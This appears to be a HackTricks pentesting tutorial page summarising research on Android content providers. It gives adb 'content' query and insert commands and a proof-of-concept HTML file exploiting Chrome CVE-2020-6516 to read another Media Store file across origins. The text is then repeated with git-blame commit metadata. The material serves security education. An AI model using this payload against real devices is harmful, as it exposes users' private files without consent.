hacktricks/mobile-pentesting/android-app-pentesting/content-protocol.md



<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>

{% embed url="https://websec.nl/" %}

**This is a summary of the post [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)**

### Listing Files in Media Store
To list files managed by the Media Store, the command below can be used:
```bash
$ content query --uri content://media/external/file
```

For a more human-friendly output, displaying only the identifier and path of each indexed file:
```bash
$ content query --uri content://media/external/file --projection _id,_data
```

Content providers are isolated in their own private namespace. Access to a provider requires the specific `content://` URI. Information about the paths for accessing a provider can be obtained from application manifests or the Android framework's source code.

### Chrome's Access to Content Providers
Chrome on Android can access content providers through the `content://` scheme, allowing it to access resources like photos or documents exported by third-party applications. To illustrate this, a file can be inserted into the Media Store and then accessed via Chrome:

Insert a custom entry into the Media Store:
```bash
cd /sdcard
echo "Hello, world!" > test.txt
content insert --uri content://media/external/file \
    --bind _data:s:/storage/emulated/0/test.txt \
    --bind mime_type:s:text/plain
```

Discover the identifier of the newly inserted file:
```bash
content query --uri content://media/external/file \
    --projection _id,_data | grep test.txt
# Output: Row: 283 _id=747, _data=/storage/emulated/0/test.txt
```

The file can then be viewed in Chrome using a URL constructed with the file's identifier.

For instance, to list files related to a specific application:
```bash
content query --uri content://media/external/file --projection _id,_data | grep -i <app_name>
```

### Chrome CVE-2020-6516: Same-Origin-Policy Bypass

The _Same Origin Policy_ (SOP) is a security protocol in browsers that restricts web pages from interacting with resources from different origins unless explicitly allowed by a Cross-Origin-Resource-Sharing (CORS) policy. This policy aims to prevent information leaks and cross-site request forgery. Chrome considers `content://` as a local scheme, implying stricter SOP rules, where each local scheme URL is treated as a separate origin.

However, CVE-2020-6516 was a vulnerability in Chrome that allowed a bypass of SOP rules for resources loaded via a `content://` URL. In effect, JavaScript code from a `content://` URL could access other resources loaded via `content://` URLs, which was a significant security concern, especially on Android devices running versions earlier than Android 10, where scoped storage was not implemented.

The proof-of-concept below demonstrates this vulnerability, where an HTML document, after being uploaded under **/sdcard** and added to the Media Store, uses `XMLHttpRequest` in its JavaScript to access and display the contents of another file in the Media Store, bypassing the SOP rules.

Proof-of-Concept HTML:
```xml
<html>
<head>
    <title>PoC</title>
    <script type="text/javascript">
        function poc()
        {
            var xhr = new XMLHttpRequest();

            xhr.onreadystatechange = function()
            {
                if(this.readyState == 4)
                {
                    if(this.status == 200 || this.status == 0)
                    {
                        alert(xhr.response);
                    }
                }
            }

            xhr.open("GET", "content://media/external/file/747");
            xhr.send();
        }
    </script>
</head>
<body onload="poc()"></body>
</html>
```

<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>

{% embed url="https://websec.nl/" %}

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

arte 2024-01-06 22:59:36 +00:00			`<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
arte 2024-01-06 22:59:36 +00:00			`Other ways to support HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
arte 2024-01-06 22:59:36 +00:00			`* If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
a 2024-02-09 00:36:13 +00:00			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
arte 2024-01-06 22:59:36 +00:00			`* Share your hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

w 2024-04-07 22:37:55 +00:00			`<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>`

			`{% embed url="https://websec.nl/" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-02-05 02:29:11 +00:00			`This is a summary of the post [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
a 2024-02-05 02:29:11 +00:00			`### Listing Files in Media Store`
			`To list files managed by the Media Store, the command below can be used:`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```bash
			`$ content query --uri content://media/external/file`
			```

a 2024-02-05 02:29:11 +00:00			`For a more human-friendly output, displaying only the identifier and path of each indexed file:`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```bash
			`$ content query --uri content://media/external/file --projection _id,_data`
			```

a 2024-02-05 02:29:11 +00:00			Content providers are isolated in their own private namespace. Access to a provider requires the specific `content://` URI. Information about the paths for accessing a provider can be obtained from application manifests or the Android framework's source code.
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
a 2024-02-05 02:29:11 +00:00			`### Chrome's Access to Content Providers`
			Chrome on Android can access content providers through the `content://` scheme, allowing it to access resources like photos or documents exported by third-party applications. To illustrate this, a file can be inserted into the Media Store and then accessed via Chrome:
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
a 2024-02-05 02:29:11 +00:00			`Insert a custom entry into the Media Store:`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```bash
a 2024-02-05 02:29:11 +00:00			`cd /sdcard`
			`echo "Hello, world!" > test.txt`
			`content insert --uri content://media/external/file \`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			`--bind _data:s:/storage/emulated/0/test.txt \`
			`--bind mime_type:s:text/plain`
			```

a 2024-02-05 02:29:11 +00:00			`Discover the identifier of the newly inserted file:`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```bash
a 2024-02-05 02:29:11 +00:00			`content query --uri content://media/external/file \`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			`--projection _id,_data \| grep test.txt`
a 2024-02-05 02:29:11 +00:00			`# Output: Row: 283 _id=747, _data=/storage/emulated/0/test.txt`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```

a 2024-02-05 02:29:11 +00:00			`The file can then be viewed in Chrome using a URL constructed with the file's identifier.`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
a 2024-02-05 02:29:11 +00:00			`For instance, to list files related to a specific application:`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```bash
a 2024-02-05 02:29:11 +00:00			`content query --uri content://media/external/file --projection _id,_data \| grep -i <app_name>`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```

a 2024-02-05 02:29:11 +00:00			`### Chrome CVE-2020-6516: Same-Origin-Policy Bypass`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
a 2024-02-05 02:29:11 +00:00			The _Same Origin Policy_ (SOP) is a security protocol in browsers that restricts web pages from interacting with resources from different origins unless explicitly allowed by a Cross-Origin-Resource-Sharing (CORS) policy. This policy aims to prevent information leaks and cross-site request forgery. Chrome considers `content://` as a local scheme, implying stricter SOP rules, where each local scheme URL is treated as a separate origin.
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
a 2024-02-05 02:29:11 +00:00			However, CVE-2020-6516 was a vulnerability in Chrome that allowed a bypass of SOP rules for resources loaded via a `content://` URL. In effect, JavaScript code from a `content://` URL could access other resources loaded via `content://` URLs, which was a significant security concern, especially on Android devices running versions earlier than Android 10, where scoped storage was not implemented.
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
a 2024-02-05 02:29:11 +00:00			The proof-of-concept below demonstrates this vulnerability, where an HTML document, after being uploaded under /sdcard and added to the Media Store, uses `XMLHttpRequest` in its JavaScript to access and display the contents of another file in the Media Store, bypassing the SOP rules.
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
a 2024-02-05 02:29:11 +00:00			`Proof-of-Concept HTML:`
			```xml
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			`<html>`
			`<head>`
			`<title>PoC</title>`
			`<script type="text/javascript">`
			`function poc()`
			`{`
			`var xhr = new XMLHttpRequest();`

			`xhr.onreadystatechange = function()`
			`{`
			`if(this.readyState == 4)`
			`{`
			`if(this.status == 200 \|\| this.status == 0)`
			`{`
			`alert(xhr.response);`
			`}`
			`}`
			`}`

			`xhr.open("GET", "content://media/external/file/747");`
			`xhr.send();`
			`}`
			`</script>`
			`</head>`
			`<body onload="poc()"></body>`
			`</html>`
			```

w 2024-04-07 22:37:55 +00:00			`<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>`

			`{% embed url="https://websec.nl/" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

arte 2024-01-06 22:59:36 +00:00			`<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
arte 2024-01-06 22:59:36 +00:00			`Other ways to support HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
arte 2024-01-06 22:59:36 +00:00			`* If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
a 2024-02-09 00:36:13 +00:00			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
arte 2024-01-06 22:59:36 +00:00			`* Share your hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`